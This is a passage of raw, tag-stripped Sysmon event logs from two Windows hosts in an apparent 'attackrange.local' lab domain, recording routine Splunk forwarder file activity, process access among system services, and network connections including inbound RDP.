Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.324{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3AC60EDBAC0961C9E7E28414C68D74,SHA256=2B80CC81368CF96ACA8B3319F01861E201FE71D6B696B92C27AB047738E91418,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:27.210{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52474-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:28.071{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49879AB4CA8664870917398B8C96D782,SHA256=DE1351C3F1AB8678535C2FA3323DBC4E2B5E9C62995A0AFE211C4A63216EF135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.167{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9E4C57AF4C055675D61AA9ECA9AC430,SHA256=C8F7843D2071E34198A88F9C84D3FFFCB52F3A03400475BE1464DDDC521DBF1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.042{69CF5F33-8ABF-6151-C379-00000000FD01}3523904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.745{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23D2B774F1882F1DA1C88B56393A0097,SHA256=C903ED740473DEEEB25FF23C78EC748073FC9F09C701DD126D00D7E4FF61DD28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.464{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB71F96725C13DD9834826DA1E8AF1E,SHA256=4BAC9D91FDB5EFCCC7B0F6F1B242EFC295A3808FD78A8B45C3A3B93AA044C650,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.386{69CF5F33-8AC1-6151-C579-00000000FD01}32363972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:29.970{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32374D402242B26793AEDA19CE046E39,SHA256=F80C3C4BD28E30A3251519B54F6BF24E1317567650E016B9D7AB7A86FFD3E1C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:29.970{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE7DBBCAA08E5A389493CFF23176CD26,SHA256=DCC025FF179C7C6D1ACA91B6B9F4E83F36E265D817E348C720AEF42059B33A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:29.104{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2DA497A9669F404DBE4650BAEC7110,SHA256=291A75E05C9C323300C524D0412A83E1BD5EB714B56E914C097DCDC138528190,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AC1-6151-C579-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8AC1-6151-C579-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.214{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AC1-6151-C579-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:29.199{69CF5F33-8AC1-6151-C579-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.535{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49759-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:30.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888C410B12960AA7E8CA72A851C1D805,SHA256=90333FEA8C52E7329836D0DD79247ECEC5BD94593DD8FE24FDC2ECF4FAFBC76C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:30.774{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4307MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:30.154{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2FF7CE6F97E8E86E5F254591EF2131,SHA256=0D7ED5D9ED03755A5118C7DE952D9E75BF4CA8E63ECC50ED317FB9D28DADFA58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.778{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59381-false10.0.1.12-8000- 354300x80000000000000001050113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:27.931{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53362-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:31.605{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=889D515C7C84878858AEBAA1961634A0,SHA256=342F0231D23D92AC346748BCB89FFCD6D5404290D3DFCEA52B7BAD61C83A57E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:28.888{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51892-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:31.787{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4308MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:31.155{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D49F27570FD392F498E2E2C4180D4395,SHA256=77B808194BF3568EBDF3443D43FAF7F0AA3D209874CF0001F9F5902ABDBB1451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:32.839{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD2ACB98FB0C30FFAB7C0D072E812F6,SHA256=874E8FE52DE0DBCA1B257AB36C3F2E7903F7058A6F067BF8398D1BF95CC0E83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:32.538{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32374D402242B26793AEDA19CE046E39,SHA256=F80C3C4BD28E30A3251519B54F6BF24E1317567650E016B9D7AB7A86FFD3E1C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:32.254{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF6BCB60871607BA305E8A0550C525E,SHA256=C2FB648D4A19D2871BC04AAE09676E8061CD1F9FF9BF960794DEDD0517DB3365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:32.542{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=952EFAB5793CB618D8E8ECEF4ECA9260,SHA256=C3CD3A59754D15575C0A63440C288E9A29A0359E421FA8244D5DFCFF14CA75E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:30.376{69CF5F33-7F0C-614D-0100-00000000FD01}4SystemNT 